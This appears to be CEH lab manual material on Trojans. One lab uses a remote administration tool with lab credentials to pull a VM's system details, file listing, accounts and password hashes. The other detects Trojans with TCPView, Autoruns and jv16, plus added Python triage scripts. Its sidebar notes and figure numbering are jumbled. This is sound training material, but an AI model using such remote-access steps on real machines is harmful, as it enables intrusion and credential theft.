1. Determine the ports that the HTTP proxy server Trojan uses to communicate.
Internet Connection Required: □ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
Remote Access Trojans Using Atelier Web Remote Commander
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review
Lab Scenario
A backdoor Trojan is a very dangerous infection that compromises the integrity of a computer, its data, and the personal information of its users. Remote attackers use backdoors as a means of accessing and taking control of a computer while bypassing its security mechanisms. Trojans and backdoors are types of malware; their main purpose is to send and receive data, and especially commands, through a port to another system. This port can even be a well-known port such as 80, or an out-of-the-norm port such as 7777. Trojans are most of the time disguised as legitimate and harmless applications to encourage the user to execute them. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Lab Objectives
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of this lab include:
■ Gain access to a remote computer
■ Acquire sensitive information from the remote computer
Lab Environment
To carry out this lab, you need:
■ Atelier Web Remote Commander, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Atelier Web Remote Commander
■ A computer running Windows Server 2012 (the machine on which AWRC is installed and run in this lab)
■ Windows Server 2008 running in a virtual machine (the remote target; 10.0.0.13 in this lab)
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A web browser with Internet access
■ Administrative privileges to run the tools
Lab Duration Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The version of the tool and its appearance may differ from what is shown in the lab, but the actual process of connecting to the remote machine and accessing its information is the same as shown in this lab.

TASK 1: Atelier Web Remote Commander
Lab Tasks
1. Install and launch Atelier Web Remote Commander (AWRC) in Windows Server 2012.
2. To launch AWRC, open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
FIGURE 6.1: Windows Server 2012 Start-Desktop
3. Click AW Remote Commander Professional in the Start menu apps.
FIGURE 6.2: Windows Server 2012 Start Menu Apps
4. The main window of AWRC will appear as shown in the following screenshot (AWRC PRO 9.3.9, with the SysInfo, NetworkInfo, File System, Users and Groups and Chat tabs, the Remote Host, User Name and Password fields, the Connect and Disconnect buttons and a Progress Report pane).
Note: This tool is used to gain access to all the information of the remote system.
FIGURE 6.3: Atelier Web Remote Commander main window
5. Input the IP address and the user name and password of the remote computer.
6. In this lab we have used Windows Server 2008 (10.0.0.13):
■ User name: Administrator
■ Password: qwerty@123
Note: The IP addresses and credentials might differ in your lab.
7. Click Connect to access the machine remotely.
FIGURE 6.4: Providing remote computer details
8. The following screenshot shows that you are accessing the Windows Server 2008 machine remotely. The Progress Report pane logs the connection (#16:28:24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13) and the status bar shows the bytes received and the connection duration.
FIGURE 6.5: Remote computer accessed
9. AWRC is now connected to the remote system. Click the SysInfo tab to view complete details of the virtual machine.
FIGURE 6.6: System information of the remote computer
10. Select the NetworkInfo tab, where you can view network information. Its Shares view lists the remote machine's shares (ADMIN$ "Remote Admin", C$ "Default share" and IPC$ "Remote IPC") with their permissions, maximum uses, current uses and path, and there are further views for ports and IP/transport protocols.
FIGURE 6.7: Network information of the remote computer
11. Select the File System tab. Select c:\ from the drop-down list and click Get.
12. This tab lists the complete contents of the C:\ drive of Windows Server 2008.
FIGURE 6.8: File system of the remote computer (root of c:\ with $Recycle.Bin, Boot, Documents and Settings, PerfLogs, Program Files, Program Files (x86), ProgramData, System Volume Information, Users and Windows; NTFS, fixed disk, serial number 6C27-CD39, capacity 17,177,767,936 bytes, free space 6,505,771,008 bytes)
13. Select the Users and Groups tab, which displays the complete user details in its Users, Groups and Password Hashes views. For the built-in Administrator account the Users view shows, among other things, the password age, privilege level, last logon time (9/20/2012 3:58:24 AM), account expiry (never), user RID (500), primary group RID (513) and full SID (S-1-5-21-1858180243-3007315151-1600596200-500) in domain WIN-EGBHISG14L0.
FIGURE 6.9: User information of the remote computer
FIGURE 6.10: Groups of the remote computer (the Groups view lists the local aliases with their SIDs and comments, for example Administrators S-1-5-32-544, Backup Operators S-1-5-32-551, Cryptographic Operators S-1-5-32-569, Distributed COM Users S-1-5-32-562, Event Log Readers S-1-5-32-573 and Guests S-1-5-32-546, followed by the domain global groups)
FIGURE 6.11: Information of the remote computer
14. The tool displays all these details of the remote system.
15. Analyze the results obtained from the remote computer.
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Tool/Utility: Atelier Web Remote Commander
Information Collected/Objectives Achieved:
Remotely accessed Windows Server 2008
Result:
■ System information of the remote Windows Server 2008
■ Network information of the remote Windows Server 2008
■ Complete file listing of c:\ of the remote Windows Server 2008
■ User and group details of the remote Windows Server 2008
■ Password hashes
Questions
1. Evaluate the ports that AWRC uses to perform its operations.
2. Determine whether it is possible to launch AWRC from the command line and make a connection. If yes, then illustrate how it can be done.

Internet Connection Required: □ Yes  ☑ No
Platform Supported: ☑ Classroom
Detecting Trojans
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
Most individuals are confused about the possible ways to remove a Trojan virus from a specific system. One must realize that the World Wide Web is one of the tools that transmits information as well as malicious and harmful viruses. A backdoor Trojan can be extremely harmful if not dealt with appropriately. The main function of this type of virus is to create a backdoor in order to access a specific system. With a backdoor Trojan attack, a concerned user is unaware of the possible effects until sensitive and important information is found missing from a system. With a backdoor Trojan attack, a hacker can also perform other types of malicious attacks as well. The other name for backdoor Trojans is remote access Trojans. The main reason that backdoor Trojans are so dangerous is that they hold the ability to access a particular machine remotely (source: http://www.combofix.org).
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Lab Objectives
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Analyze using Port Monitor
■ Analyze using Process Monitor
■ Analyze using Registry Monitor
■ Analyze using Startup Program Monitor
■ Create MD5 hash files for Windows directory files
Lab Environment
To carry out this lab, you need:
■ TCPView, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView
■ Autoruns, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns
■ PrcView, located at C:\CEH-Tools\CEHv7 Module 06 Trojans and Backdoors\Process Monitor Tool\PrcView
■ jv16 PowerTools, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012
■ Fsum Frontend, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend
■ A computer running Windows Server 2008 (host)
■ Windows Server 2012 running in a virtual machine (the tasks below are performed on it)
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A web browser with Internet access
■ Administrative privileges to run the tools
Note (Autoruns, disabling and deleting entries): If you don't want an entry to be active the next time you boot or log in, you can either disable or delete it. To disable an entry, uncheck it. Autoruns stores the startup information in a backup location so that it can reactivate the entry when you recheck it. For items stored in startup folders, Autoruns creates a subfolder named Autoruns disabled. Check a disabled item to re-enable it.
Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the tools and their appearance may differ from what is shown in the lab, but the actual process of listing the ports, processes and autostart entries is the same as shown in this lab.

TASK 1: TCPView
Lab Tasks
1. Go to the Windows Server 2012 virtual machine.
2. Launch TCPView from the location D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView.
3. The TCPView main window appears, with details such as Process, PID, Protocol, Local Address, Local Port, Remote Address, Remote Port and State.
Note (Autoruns): Delete items that you never want to execute by choosing Delete in the Entry menu. Only the currently selected item is deleted.
FIGURE 8.1: TCPView main window (dns.exe, PID 1572, listening on the domain port over TCP and UDP and on the UDP ports 49152-49171)
4. This tool performs port monitoring.
Note (Autoruns): If you are running Autoruns without administrative privileges on Windows Vista or later and attempt to change the state of a global entry, you will be denied access.
FIGURE 8.2: TCPView main window (svchost.exe instances listening on TCP ports such as 5504 and 49153-49187 and on the UDP ports bootps, bootpc, isakmp, teredo, ipsec-msft and llmnr; the System process, PID 4, listening on netbios-ssn, microsoft-ds, http, https and 5985)
5. TCPView now shows the state of each endpoint as well: in the following screenshot the SMB (netbios-ssn, microsoft-ds), HTTP and HTTPS listeners are in the LISTENING state and two connections from other hosts are ESTABLISHED.
Note (Autoruns): When a state change is denied for lack of administrative rights, Autoruns displays a dialog with a button that re-launches it with administrative rights. You can also use the -e command-line option to launch Autoruns with administrative rights from the start.
Note (Autoruns): There are several ways to get more information about an autorun location or entry. To view a location or entry in Explorer or Regedit, choose Jump To in the Entry menu or double-click the entry's or location's line in the display.
FIGURE 8.3: TCPView analyzing ports (the Remote Address, Remote Port and State columns show the listeners as LISTENING and the SMB connections from other hosts as ESTABLISHED)
You can also kill a process by double-clicking the respective process and then clicking the End Process button. The properties dialog shows the process description, publisher, version and image path before you decide; for dns.exe (PID 1572) these are Domain Name System (DNS) Server, Microsoft Corporation, version 6.02.8400.0000 and C:\Windows\System32\dns.exe. Check the path and publisher here first: a Trojan commonly reuses the name of a legitimate Windows binary, and the image path is what tells the two apart.
FIGURE 8.4: Killing processes
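The check made by eye in TCPView above (which process owns each listening port, and where the established connections go) can also be scripted, which is what you want once you have to review more than one machine. The following Python is an added example, not part of the CEH manual or of TCPView: it parses the text output of the two built-in Windows commands netstat -ano and tasklist /fo csv, joins them on PID, and reports listeners that are not in a per-host baseline and established connections to addresses outside the internal ranges. Both captures are constructed for the example and only modelled on the real output format; the baseline of expected listeners and the list of internal address ranges are assumptions about this particular server and have to be adapted per host.

```python
"""Added example, not part of the CEH manual or of TCPView.

It performs the same check a defender does by eye in TCPView over the text
output of `netstat -ano` and `tasklist /fo csv`. The captures, the baseline
of expected listeners and the internal address ranges are constructed
assumptions for this example, not data from the lab machine.
"""
import csv
import io
import ipaddress

# Constructed `netstat -ano` capture (not from the lab machine).
NETSTAT_OUTPUT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:53             0.0.0.0:0              LISTENING       1572
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING       3412
  TCP    10.0.0.13:49158        10.0.0.12:445          ESTABLISHED     4
  TCP    10.0.0.13:49301        203.0.113.7:80         ESTABLISHED     3412
  UDP    0.0.0.0:53             *:*                                    1572
"""

# Constructed `tasklist /fo csv` capture (not from the lab machine).
TASKLIST_OUTPUT = '''"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Services","0","1,024 K"
"svchost.exe","892","Services","0","8,512 K"
"dns.exe","1572","Services","0","9,876 K"
"svchost.exe","3412","Console","1","2,344 K"
'''

# Assumed baseline for this server: port -> image names allowed to own it.
# 5985 is WinRM over HTTP, which HTTP.sys serves inside the System process.
EXPECTED_LISTENERS = {
    53: {"dns.exe"},
    135: {"svchost.exe"},
    445: {"System"},
    5985: {"System"},
}

# Assumed internal ranges: RFC 1918, loopback, link-local and their IPv6 equivalents.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]


def parse_netstat(text):
    """Parse `netstat -ano` lines into dicts; UDP lines carry no State column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue  # banner, header and blank lines
        local_ip, local_port = parts[1].rsplit(":", 1)
        remote_ip, remote_port = parts[2].rsplit(":", 1)
        rows.append({
            "proto": parts[0],
            "local_ip": local_ip, "local_port": int(local_port),
            "remote_ip": remote_ip, "remote_port": remote_port,
            "state": parts[3] if parts[0] == "TCP" else "",
            "pid": int(parts[-1]),
        })
    return rows


def parse_tasklist(text):
    """Map PID -> image name from `tasklist /fo csv` output."""
    return {int(r["PID"]): r["Image Name"] for r in csv.DictReader(io.StringIO(text))}


def is_internal(addr):
    """True when the peer falls in an assumed internal range; '*' and names count as external."""
    try:
        ip = ipaddress.ip_address(addr.strip("[]"))
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def find_suspicious(netstat_text, tasklist_text, expected=EXPECTED_LISTENERS):
    """Return (pid, image, reason) for listeners outside the baseline and for
    established connections whose peer is not internal."""
    pid_to_image = parse_tasklist(tasklist_text)
    findings = []
    for c in parse_netstat(netstat_text):
        image = pid_to_image.get(c["pid"], "<unknown>")
        if c["proto"] == "UDP" or c["state"] == "LISTENING":
            allowed = expected.get(c["local_port"])
            if allowed is None:
                findings.append((c["pid"], image,
                                 f"unexpected listener on {c['proto']}/{c['local_port']}"))
            elif image not in allowed:
                findings.append((c["pid"], image,
                                 f"port {c['local_port']} owned by {image}, expected {sorted(allowed)}"))
        elif c["state"] == "ESTABLISHED" and not is_internal(c["remote_ip"]):
            findings.append((c["pid"], image,
                             f"outbound connection to {c['remote_ip']}:{c['remote_port']}"))
    return findings


if __name__ == "__main__":
    for pid, image, reason in find_suspicious(NETSTAT_OUTPUT, TASKLIST_OUTPUT):
        print(f"PID {pid:<6} {image:<14} {reason}")
```

On the constructed captures the script reports PID 3412 twice: an svchost.exe listening on TCP 7777 that is not in the baseline, and the same process holding a connection to 203.0.113.7:80. That pairing (a system-binary name, an unusual listener and an outbound connection from one PID) is exactly the pattern the Lab Scenario describes, and it is what you would then confirm in TCPView's properties dialog by reading the image path. To run it against a live host, replace the two constants with the output of the real commands (for example from a saved transcript).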
TASK 2: Autoruns
6. Go to the Windows Server 2012 virtual machine. Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns.
7. Autoruns lists every configured autostart entry: logon entries, Explorer and Internet Explorer extensions, scheduled tasks, services, drivers, codecs, boot-execute entries, image hijacks, AppInit DLLs, KnownDLLs, Winlogon notifications, Winsock, print, LSA and network providers and sidebar gadgets, each with its description, publisher and image path.
Note (Autoruns): You can view Explorer's file properties dialog for an entry's image file by choosing Properties in the Entry menu. You can also have Autoruns automatically run an Internet search in your browser by selecting Search Online in the Entry menu.
FIGURE 8.5: Autoruns main window (Everything tab on WIN-2N9STOSGIEN, showing the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run entries HotKeysCmds, IgfxTray and Persistence from Intel Corporation, the Wow6432Node Run entries Adobe ARM, Adobe Reader and EPSON_UD_S..., and the Winlogon AppSetup entry UsrLogon cmd, each with description, publisher and image path)
Note (Autoruns): Simply run Autoruns and it shows you the currently configured autostart applications in the locations that most directly execute applications. Perform a new scan that reflects changes to options by refreshing the display.
10. The following is the detailed list on the Logon tab.
Note (Autoruns): The Internet Explorer tab shows Browser Helper Objects (BHOs), Internet Explorer toolbars and extensions.
FIGURE 8.9: Autoruns Logon list (the Run entries above plus googletalk from Google, the Java Update Scheduler from Sun Microsystems, Inc., and the entries in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup)
11. The following are the Explorer list details.
Note (Autoruns): The Services tab shows all Windows services configured to start automatically when the system boots.
FIGURE 8.10: Autoruns Explorer list (a protocol filter for text/xml from Microsoft Corporation under HKLM\SOFTWARE\Classes\Protocols\Filter, and the Snagit shell extension DLL from TechSmith Corporation and the WinRAR shell extension from Alexander Roshal registered as context menu handlers under HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers, its Wow6432Node counterpart and HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers)
12. The following are the Services list details.
Note (Autoruns): The Drivers tab displays all kernel-mode drivers registered on the system except those that are disabled.
FIGURE 8.11: Autoruns Services list (HKLM\System\CurrentControlSet\Services entries such as AdobeFlashPla... from Adobe Systems Incorporated, c2wts, ose, osppsvc and WSusCertServer from Microsoft Corporation, EMP_UDSA from SEIKO EPSON CORPORATION and MozillaMaintenance from the Mozilla Foundation, each with description, publisher and image path)
13. The following are the Drivers list details.
CEH Lab Manual Page 474
Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

[Screenshot: Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinternals.com, Drivers tab, location HKLM\System\CurrentControlSet\Services. Rows (all image paths under c:\windows\system32\drive...):
3ware    | LSI 3ware SCSI Storport Driver | LSI
adp94xx  | Adaptec Windows SAS/SA...      | Adaptec, Inc.
adpahci  | Adaptec Windows SATA St...     | Adaptec, Inc.
adpu320  | Adaptec StorPort Ultra320...   | Adaptec, Inc.
amdsata  | AHCI 1.2 Device Driver         | Advanced Micro Devices
amdsbs   | AMD Technology AHCI Co...      | AMD Technologies Inc.
amdxata  | Storage Filter Driver          | Advanced Micro Devices
arcsas   | Adaptec SAS RAID WS 03...      | PMC-Sierra, Inc.
(name not legible) | Adaptec RAID Storport Driver | PMC-Sierra, Inc.
Status bar: Ready; Windows Entries Hidden. Tooltip for the Scheduled Tasks tab: "Task scheduler tasks configured to start at boot or logon."]
FIGURE 8.12: Autoruns Drivers list.
14. The following is the KnownDLLs list in Autoruns. Autoruns reports the three WoW64 entries as File not found even though wow64.dll, wow64cpu.dll and wow64win.dll are part of Windows (they live under %SystemRoot%\System32 on x64 systems), so a File not found on a KnownDLLs entry should be checked by hand against the real path rather than treated as an indicator on its own.

[Screenshot: Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinternals.com, KnownDLLs tab, location HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls. Rows: _Wow64, Wow64cpu and Wow64win, each with Image Path "File not found: C:\Windows..." Status bar: Ready; Windows Entries Hidden.]
FIGURE 8.13: Autoruns KnownDLLs list.
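The Autoruns notes scattered through this lab describe the workflow a defender actually needs: export the autostart list, compare it with a saved baseline (File | Compare shows new entries in green but not deleted ones), and look hard at entries whose publisher is "(Not verified)", whose image is missing on disk, or which sit in the autostart categories the notes single out as malware favourites (Winsock Providers, Print Monitors, LSA Providers, Winlogon). The Python script below is an added example, not part of the lab manual or of Sysinternals, that performs that triage over two constructed CSV exports. The column layout is the autorunsc -c layout as assumed here; check the header row of your own export and adjust the field names if it differs. The hostname WIN-2N9STOSGIEN and the legitimate entries are taken from the screenshots; the "WindowsUpdate" Run entry in %TEMP% and the "NetFilter LSP" Winsock provider are constructed examples of what a dropped Trojan looks like, not real samples. As the KnownDLLs caveat in step 14 shows, the "image missing on disk" flag is a prompt to check the path by hand, not a verdict.

```python
"""Triage an Autoruns CSV export against a saved baseline.

Added example for the lab; not part of Sysinternals Autoruns.  The column
names follow the autorunsc -c layout as assumed here; adjust KEY_FIELDS and
the field names used below if your export's header row differs.
"""
import csv
import io
import json

# Fields that identify one autostart entry across two exports (assumed layout).
KEY_FIELDS = ("Entry Location", "Entry", "Image Path", "Launch String")

# Autostart categories the Autoruns notes in this lab say malware favours.
HIGH_VALUE_CATEGORIES = {"Winsock Providers", "Print Monitors", "LSA Providers", "Winlogon"}

# Directories an unprivileged user can write to; a legitimate system-wide
# autostart image rarely lives there.
SUSPECT_PATH_FRAGMENTS = (
    "\\appdata\\local\\temp\\",
    "\\windows\\temp\\",
    "\\users\\public\\",
    "\\programdata\\",
)

# Constructed baseline export (not real data): the machine as it was built.
BASELINE_CSV = r'''"Entry Location","Entry","Enabled","Category","Profile","Description","Signer","Company","Image Path","Version","Launch String"
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Adobe ARM","enabled","Logon","System-wide","Adobe Reader and Acrobat Manager","(Verified) Adobe Systems Incorporated","Adobe Systems Incorporated","c:\program files (x86)\common files\adobe\arm\1.0\adobearm.exe","","C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"HKLM\System\CurrentControlSet\Services","MozillaMaintenance","enabled","Services","System-wide","The Mozilla Maintenance Service","(Verified) Mozilla Corporation","Mozilla Foundation","c:\program files (x86)\mozilla maintenance service\maintenanceservice.exe","","C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
"HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls","Wow64cpu","enabled","KnownDLLs","System-wide","","","","File not found: C:\Windows\System32\wow64cpu.dll","","wow64cpu.dll"
'''

# Constructed current export: the baseline plus two entries a dropped Trojan
# might add (hypothetical names and paths).
CURRENT_CSV = BASELINE_CSV + r'''"HKCU\Software\Microsoft\Windows\CurrentVersion\Run","WindowsUpdate","enabled","Logon","WIN-2N9STOSGIEN\Administrator","","(Not verified) Microsoft Corporation","Microsoft Corporation","c:\users\administrator\appdata\local\temp\svchost.exe","","C:\Users\Administrator\AppData\Local\Temp\svchost.exe"
"HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries","NetFilter LSP","enabled","Winsock Providers","System-wide","","(Not verified)","","c:\programdata\netfilter\nflsp.dll","","c:\programdata\netfilter\nflsp.dll"
'''


def parse_autoruns_csv(text):
    """Return one dict per row of an export; the csv module handles the quoting."""
    return list(csv.DictReader(io.StringIO(text)))


def entry_key(row):
    """Identity of an entry for baseline comparison."""
    return tuple(row.get(field, "") for field in KEY_FIELDS)


def compare_exports(baseline_rows, current_rows):
    """Like File | Compare in the Autoruns GUI, but also reports removed entries."""
    baseline = {entry_key(r): r for r in baseline_rows}
    current = {entry_key(r): r for r in current_rows}
    new = [r for k, r in current.items() if k not in baseline]
    removed = [r for k, r in baseline.items() if k not in current]
    return new, removed


def triage_reasons(row):
    """Reasons an entry deserves a manual look; an empty list means nothing stood out."""
    reasons = []
    signer = row.get("Signer", "")
    if not signer or signer.startswith("(Not verified)"):
        reasons.append("unverified signature")
    image = row.get("Image Path", "").lower()
    if image.startswith("file not found"):
        # Check the path by hand: Figure 8.13 shows Windows' own WoW64 DLLs
        # reported this way, so this flag alone is not a verdict.
        reasons.append("image missing on disk")
    if any(fragment in image for fragment in SUSPECT_PATH_FRAGMENTS):
        reasons.append("runs from a user-writable location")
    category = row.get("Category", "")
    if category in HIGH_VALUE_CATEGORIES:
        reasons.append("high-value autostart category: " + category)
    return reasons


def triage_export(current_csv, baseline_csv=None):
    """Flag every current entry with a triage reason; with a baseline, also list
    entries added since it was taken or removed from it."""
    current_rows = parse_autoruns_csv(current_csv)
    flagged = {}
    for row in current_rows:
        reasons = triage_reasons(row)
        if reasons:
            flagged[row["Entry"]] = reasons
    report = {"flagged": flagged, "new": [], "removed": []}
    if baseline_csv is not None:
        new, removed = compare_exports(parse_autoruns_csv(baseline_csv), current_rows)
        report["new"] = [r["Entry"] for r in new]
        report["removed"] = [r["Entry"] for r in removed]
    return report


if __name__ == "__main__":
    # With real files: triage_export(open("current.csv").read(), open("baseline.csv").read())
    # (check the encoding of your export before opening it).
    print(json.dumps(triage_export(CURRENT_CSV, BASELINE_CSV), indent=2))
```

Run against the constructed data, the report lists WindowsUpdate and NetFilter LSP as new, flags both for an unverified signature and a user-writable image path (and the LSP for its category), and flags Wow64cpu only for the missing image; the two verified vendor entries are not flagged. A baseline is only useful if it was taken from a known-clean build, so triage every entry of the current export, not just the new ones.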
15. Install and launch jv16 PowerTools 2012 in Windows Server 2012 (host machine).
TASK 4: jv16 PowerTools
16. jv16 PowerTools is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.
17. To launch jv16 PowerTools, open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
[Screenshot: Windows Server 2012 Start screen.]
FIGURE 7.1: Windows Server 2012 Start-Desktop
18. Click jv16 PowerTools 2012 in the Start menu apps.
Autoruns Winlogon Notifications tab: shows DLLs that register for Winlogon notification of logon events.
FIGURE 7.2: Windows Server 2012 Start Menu Apps
19. Click the Clean and fix my computer icon.
Autoruns Winsock Providers tab: shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can uninstall them, but cannot disable them.
[Screenshot: jv16 PowerTools 2012 home page (Macecraft Software). Menu: File, Language, Tools, Help. Trial limitation in effect - 60 days left; Live Support: Online; Handbook not available. Left pane: Home, Registry Tools, File Tools, System Tools, Privacy Tools, Backups, Action History, Settings; Registry Health 92%, PC Health 95%. Home tasks: Clean and fix my computer, Fully remove software and leftovers, Speed up my computer, Immunize my computer, Verify my downloads are safe to run, Control which programs start automatically. Status text: "jv16 PowerTools (2.1.0.1173) running on Datacenter Edition (x64) with 7.9 GB of RAM [10:29:45 Tip]: Your system has now been analyzed. The health score of your computer is 95 out of 100 and the health score of your Windows registry is 92 out of 100. If you scored under 100 you can improve the ratings by using the Clean and Fix My Computer tool."]
FIGURE 8.20: jv16 Home page.
20. The Clean and fix my computer dialog box appears. Click the Settings tab and then click the Start button.

[Screenshot: jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer. Tabs: Settings, Additional safety, Additional options, Search words, Ignore words. The Settings tab has a slider between "Emphasize safety over both scan speed and the number of found errors" and "Emphasize the number of found errors and speed over safety and accuracy". Selected setting: "Normal system scan policy: all Windows-related data is skipped for additional safety. Only old temp files are listed." Buttons: Start, Cancel.]
Autoruns LSA Providers tab: shows registered Local Security Authority (LSA) authentication, notification and security packages.
FIGURE 8.21: jv16 Clean and fix my computer dialogue.
21. It will analyze your system for files; this takes a few minutes.

[Screenshot: jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer: "Analyzing your computer. This can take a few minutes. Please wait..." with an Abort button.]
Autoruns Print Monitors tab: displays DLLs that load into the print spooling service. Malware has used this support to autostart itself.
FIGURE 8.22: jv16 Clean and fix my computer Analyzing.
22. Computer items are listed after the analysis completes.
You can save the results of an Autoruns scan with File->Save and load a saved scan with File->Load. These commands work with native Autoruns file formats, but you can use File->Export to save a text-only version of the scan results. You can also automate the generation of native Autoruns export files with command line options.

[Screenshot: jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer. Columns: Item, Severity, Description, Tags. Tree:
Registry Errors (7)
  Invalid file or directory reference (7)
Registry junk (266)
  Obsolete software entry (4)
  Useless empty key (146)
  Useless file extension (116)
Start menu and desktop items (23)
Buttons: Delete, Close. Status: Selected: 0, highlighted: 0, total: 296.]
FIGURE 8.24: jv16 Clean and fix my computer Items details.
23. Selected item details are as follows.
Autoruns Sidebar tab: displays Windows sidebar gadgets.

[Screenshot: jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer, Registry Errors (7) expanded. Under Invalid file or directory reference, each row is a key under HKCR\Instal... or HKLM\Software..., severity 13%, described as "File or directory 'X:...'" or "File or directory 'C:...'" (the path the key refers to no longer exists). Registry junk (266) follows. Status: Selected: 0, highlighted: 0, total: 296.]
You can compare the current Autoruns display with previous results that you've saved. Select File | Compare and browse to the saved file. Autoruns will display in green any new items, which correspond to entries that are not present in the saved file. Note that it does not show deleted items.
FIGURE 8.23: jv16 Clean and fix my computer Items.
24. The Registry junk section provides details for selected items.
If you are running Autoruns without administrative privileges on Windows Vista and attempt to change the state of a global entry, you'll be denied access. Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights.

[Screenshot: jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer, Registry junk (266) expanded. Obsolete software entry (4): keys under HKCU\Software... and HKUS\S-1-5-..., severity 30%. Useless empty key (146): keys under HKCR\..., severity 10% to 20%. Status: Selected: 0, highlighted: 0, total: 296.]
FIGURE 8.25: jv16 Clean and fix my computer Item registry junk.
25. Select all check boxes in the item list and click Delete. A dialog box appears with the warning "You are about to delete a lot of erroneous registry data. Using the Fix option is always the better option. Are you sure you know what you are doing and want to proceed?" Click Yes. Note that the tool itself recommends Fix over Delete; outside a lab, confirm that a backup of the removed data exists (the Backups tool in step 32 shows the backup jv16 creates for the clean) so that an application broken by the deletion can be restored.
When the Hide Empty Locations selection in the Autoruns Options menu is checked, Autoruns doesn't show locations with no entries.

[Screenshot: jv16 PowerTools 2012 confirmation dialog over the item list; Start menu and desktop items 23/23 selected; Selected: 296, highlighted: 0, total: 296.]
FIGURE 8.26: jv16 Clean and fix my computer Item check box.
26. Go to the Home tab, and click the Control which programs start automatically icon.
The Verify Signatures option appears in the Autoruns Options menu on systems that support image signing verification and can result in Autoruns querying certificate revocation list (CRL) web sites to determine if image signatures are valid.
FIGURE 8.28: jv16 Control which programs start automatically.
27. Check the programs in Startup Manager, and then select the appropriate action.
The Hide Microsoft Entries selection omits images that have been signed by Microsoft if Verify Signatures is selected, and omits images that have Microsoft in their resource's company name field if Verify Signatures is not selected.

[Screenshot: jv16 PowerTools 2012 [W8-x64] - Startup Manager. Detail pane for the highlighted entry: Process running: Yes; System entry: No; PID 4280; Program jusched.exe; Threads 4; Filename C:\Program Files (x86)\Common...; Command line "C:\Program Files (x86)\Common..."; Base priority Normal; Memory usage 9.12 MB; Page file usage 2.23 MB; Description Java(TM) Update Scheduler; File size 246.92 KB. Found software (all Enabled = Yes):
jusched.exe    | Java(TM) Update Scheduler | C:\Program Files (x86)\Common...
